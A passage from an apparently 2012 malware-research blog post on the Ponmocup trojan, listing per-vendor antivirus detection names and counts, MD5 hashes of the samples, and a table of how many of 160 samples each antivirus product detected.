W32/FakeAlert.FT.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Commtouch = W32/FakeAlert.LP.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Commtouch = W32/Swisyn.E.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Comodo = TrojWare.Win32.Swisyn.C</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 Comodo = TrojWare.Win32.Trojan.Agent.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 Comodo = UnclassifiedMalware</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 DrWeb = Trojan.DownLoader5.4289</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 DrWeb = Trojan.DownLoader5.5892</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 DrWeb = Trojan.Fakealert.26434</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 DrWeb = Trojan.Hosts.2582</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 DrWeb = Trojan.Hosts.303</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 DrWeb = Trojan.MulDrop1.59103</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 4 DrWeb = Trojan.WinSpy.1014</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 DrWeb = Trojan.WinSpy.origin</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Emsisoft = Riskware.AdWare.Win32.SuperJuan!IK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 Emsisoft = Trojan-Downloader.Win32.Ponmocup!IK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Emsisoft = Trojan.Pirminay!IK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 4 Emsisoft = Trojan.Win32.Pirminay!IK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Emsisoft = Trojan.Win32.Swisyn!IK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 F-Prot = W32/FakeAlert.FT.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Prot = W32/FakeAlert.LP.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 F-Prot = W32/Swisyn.E.gen!Eldorado</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Backdoor.Generic.542938</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Gen:Variant.Graftor.1139</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Gen:Variant.Graftor.3421</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Gen:Variant.Vundo.11</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.5274711</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.6148391</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 F-Secure = Trojan.Generic.6270838</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.6764589</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.6871065</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.6892427</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 F-Secure = Trojan.Generic.KD.393940</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 F-Secure = Trojan.QHosts.AVD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = PossibleThreat</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Evx.BG!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Jorik_Pirminay.ANO!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Kryptik.ANL!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Malware_fam.NB</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Monder.MZYL!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Fortinet = W32/Pirminay.A!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Ponmocup.A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Ponmocup.AA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Fortinet = W32/Swisyn.CQV!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Fortinet = W32/Virtum!tr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Backdoor.Generic.542938</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Gen:Variant.Graftor.1139</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Gen:Variant.Graftor.3421</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Gen:Variant.Vundo.11</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.5274711</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.6148391</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 GData = Trojan.Generic.6270838</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.6764589</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.6871065</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.6892427</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 GData = Trojan.Generic.KD.393940</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 GData = Trojan.QHosts.AVD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 Ikarus = Trojan-Downloader.Win32.Ponmocup</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Ikarus = Trojan.Pirminay</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 4 Ikarus = Trojan.Win32.Pirminay</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Ikarus = Trojan.Win32.Swisyn</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Ikarus = not-a-virus:AdWare.Win32.SuperJuan</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Jiangmin = Trojan/Generic.kfzm</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Jiangmin = Trojan/Generic.kkfx</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Jiangmin = Trojan/Generic.knvv</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Jiangmin = Trojan/Pirminay.gr</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Jiangmin = Trojan/Pirminay.gs</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Jiangmin = Trojan/Pirminay.up</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Jiangmin = Trojan/Swisyn.cby</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Jiangmin = TrojanDownloader.Agent.ctuc</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 K7AntiVirus = Riskware</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 12 K7AntiVirus = Trojan</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Kaspersky = HEUR:Trojan.Win32.Generic</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Jorik.Pirminay.ano</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Jorik.Pirminay.aoq</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Jorik.Pirminay.avy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Monder.mzyl</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Pirminay.bg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Pirminay.bhy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Pirminay.cub</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Pirminay.hjy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Kaspersky = Trojan.Win32.Pirminay.hlu</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Kaspersky = Trojan.Win32.Swisyn.jyb</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Downloader.a!bu</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Downloader.a!cc</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Downloader.a!vz</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Generic Downloader.x!g2z</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Generic.dx!yak</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Generic.evx!bd</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 McAfee = Generic.evx!bg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee = Kryp.b</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 McAfee = Swisyn.s</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Downloader.a!cc</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Generic Downloader.x!g2z</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Generic.dx!yak</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Generic.evx!bd</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 McAfee-GW-Edition = Generic.evx!bg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 4 McAfee-GW-Edition = Heuristic.BehavesLike.Win32.Downloader.A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Heuristic.BehavesLike.Win32.Downloader.D</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Heuristic.BehavesLike.Win32.Downloader.H</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Heuristic.LooksLike.Trojan.Dropper.B</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 McAfee-GW-Edition = Kryp.b</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 McAfee-GW-Edition = Swisyn.s</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Microsoft = Trojan:Win32/Meredrop</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 16 Microsoft = TrojanDownloader:Win32/Ponmocup.A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Microsoft = TrojanDownloader:Win32/Renos.KC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 NOD32 = Win32/Ponmocup.AA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 NOD32 = Win32/Qhost.NRX</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 NOD32 = Win32/TrojanDownloader.Agent.PXO</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 NOD32 = a variant of Win32/Kryptik.LLT</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 NOD32 = a variant of Win32/Kryptik.SWI</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 NOD32 = a variant of Win32/Kryptik.UFA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 NOD32 = a variant of Win32/Kryptik.VDN</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 NOD32 = a variant of Win32/Ponmocup.AA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 NOD32 = probably a variant of Win32/Agent.BTILRDN</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Norman = W32/DLoader.ACMAD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 Norman = W32/Kryptik.AIF</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Norman = W32/Obfuscated.L</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 PCTools = Malware.Changeup</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 PCTools = Trojan.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 PCTools = Trojan.Milicenso</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 Panda = Generic Trojan</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Panda = Suspicious file</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Panda = Trj/Agent.OLO</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 Panda = Trj/CI.A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Panda = Trj/Qhost.LU</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Rising = Trojan.Win32.Generic.129CDFF1</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Rising = Trojan.Win32.QHost.awf</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 SUPERAntiSpyware = Trojan.Agent/Gen-Falcomp[RE]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 SUPERAntiSpyware = Trojan.Agent/Gen-Falprod[RE]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 SUPERAntiSpyware = Trojan.Agent/Gen-HackHost</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 SUPERAntiSpyware = Trojan.Agent/Gen-Qhost</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Sophos = Mal/Generic-L</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Sophos = Mal/Ponmocup-A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Sophos = Mal/Swisyn-D</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Sophos = Sus/Behav-278</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Sophos = Troj/Ponmo-A</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Sophos = Troj/Virtum-Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Symantec = Suspicious.Cloud</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 Symantec = Trojan.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Symantec = Trojan.Milicenso</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 7 Symantec = W32.Changeup!gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Symantec = WS.Reputation.1</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Downloader.Agent.pxo</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Kryptik.vdn</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Pirminay.bhf</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Pirminay.bhy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Pirminay.fwy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TheHacker = Trojan/Ponmocup.aa</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 TheHacker = Trojan/Swisyn.jyb</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 TrendMicro = TROJ_FAM_00001e3.TOMA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R11C7KB</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R21C2F4</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R21C2FE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R23C3BD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R3BCRBR</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R47C7K8</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R47C7KE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_GEN.R4AC7KK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_PONMOCUP.AB</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro = TROJ_PONMOCUP.AC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 TrendMicro-HouseCall = TROJ_FAM_00001e3.TOMA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R11C7KB</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R21C2F4</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R21C2FE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R23C3BD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R3BCRBR</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R47C7K8</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R47C7KE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_GEN.R4AC7KK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_PONMOCUP.AB</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 TrendMicro-HouseCall = TROJ_PONMOCUP.AC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = SScope.Trojan.Pirminay.chc</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 VBA32 = SScope.Trojan.VB.0609</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = Trojan.Fksys.81105</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = Trojan.Jorik.Pirminay.ano</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = Trojan.Pirminay.bg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = Trojan.Pirminay.cta</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VBA32 = Trojan.Pirminay.fwz</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VIPRE = Trojan-Downloader.Win32.Agent.ecjo (v)</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 7 VIPRE = Trojan.Win32.Generic!BT</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VIPRE = Trojan.Win32.Monder.gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 VIPRE = Trojan.Win32.Swisyn.jyb (v)</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 ViRobot = Trojan.Win32.Swisyn.65024</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Kryptik!XPYaFkgQJuY</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Kryptik!YhtS8OcgDPE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Monder!KTXAshYxjGA</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Pirminay!1T9hymiWPH0</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Ponmocup!Qf/SCxIUIDk</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = Trojan.Ponmocup!lGJTkqsZNdg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 VirusBuster = Trojan.Swisyn!whPY1JLc4mw</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 VirusBuster = TrojanSpy.Agent!jdleA1Gsspg</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 eSafe = Win32.GenVariant.Gra</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 eSafe = Win32.HEURCrypted.E</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 eSafe = Win32.Milicenso</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 eSafe = Win32.TRGraftor</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 eSafe = Win32.Trojan</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 eTrust-Vet = Win32/Swisyn.R</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Backdoor/W32.Agent.294341</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 nProtect = Gen:Variant.Graftor.3421</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Jorik.219136.B</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Jorik.236032.B</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Jorik.243712.D</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Pirminay.17176</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Pirminay.313344</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Pirminay.438601</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.QHosts.122880</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.QHosts.147456</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Swisyn.126976.G</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Swisyn.157184</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Swisyn.184320.I</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Swisyn.241664.F</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 nProtect = Trojan/W32.Swisyn.79872</span></span><br />
<br />
There is only one A/V product that recognized more than half the samples with the same detection name:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;">16 Microsoft = TrojanDownloader:Win32/Ponmocup.A</span></span><br />
<br />
The samples MD5 are:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;">MD5 c23425f852e3ad188effc205317142fc</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 bb479a7e69c5e1c503aa6dd506c732f3</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 9e08f52039eeacf7f3e8696046358684</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 97a1acc085849c0b9af19adcf44607a7</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 f8fd20b40667882e9e7301fb76b890c0</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 4734169e48df4fea56bce65ec0e56066</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 fcac6af96d814f68c9a48d9cc5ad91ed</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 f7efabd89d9b4d4ee3f3b4875c11b47c</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 ffe728d69c233b6f09b016084be62270</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 edf380c2b7526cf521818af7d1ea6727</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 e918c9bd0093b52590c3c93751a84b56</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 e5dfa7c6ef3b2853a98f02178ffbfed8</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 cc699a17b1f9fc43d419f2d8cbf1e24b</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 b8a3097df22fe768639738fbf1afca98</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 b6babab0cbcc42a07d89df325ddeccdf</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 a939841b8e4724d1b0163b30f0d9baec</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 651589d6999c4017c8f42a9cabdb5a85</span><br style="font-family: courier new;" /><span style="font-family: courier new;">MD5 5e501ecbadd0a9d0f380f918f1c4986e</span><br face="courier new" /><span style="font-family: courier new;">MD5 5b9ece2e5d16bdcb86e3ad8b3259991a</span><br face="courier new" /><span style="font-family: courier new;">MD5 58d7c19e16e421440e372780832ecf61</span></span><br />
<br />
And here are some <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/VirusShare/Ponmocup-AV-detections.txt">more file details</a>.<br />
<br />
<br />
<div style="color: blue;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-13:</span></div>
<i style="color: blue;">I received the results for all 160 Ponmocup samples. See additional stats at the end.</i><br />
<br />
Here the number of detections of 160 samples for each A/V:<br />
<br />
<span style="font-size: small;"><span style="font-family: "Courier New",Courier,monospace;"> 158 GData</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 158 BitDefender</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">157 Ikarus</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 155 AntiVir</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 154 NOD32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 153 F-Secure</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 151 AVG</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 149 Avast</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;">148 VIPRE</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 146 Panda</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">145 Microsoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 145 McAfee-GW-Edition</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 141 McAfee</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;">141 Comodo</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 140 AhnLab-V3</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 138 Sophos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 138 Norman</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 137 nProtect</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: lime;">136 Kaspersky</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 134 TrendMicro-HouseCall</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 133 TrendMicro</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">133 Emsisoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 132 K7AntiVirus</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 130 Symantec</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 127 Jiangmin</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 124 PCTools</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 123 TheHacker</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 123 Fortinet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 114 VirusBuster</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 101 Avast5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 100 DrWeb</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 99 Antiy-AVL</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 88 VBA32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 78 CAT-QuickHeal</span><br style="font-family: "Courier New",Courier,monospace;" /><span 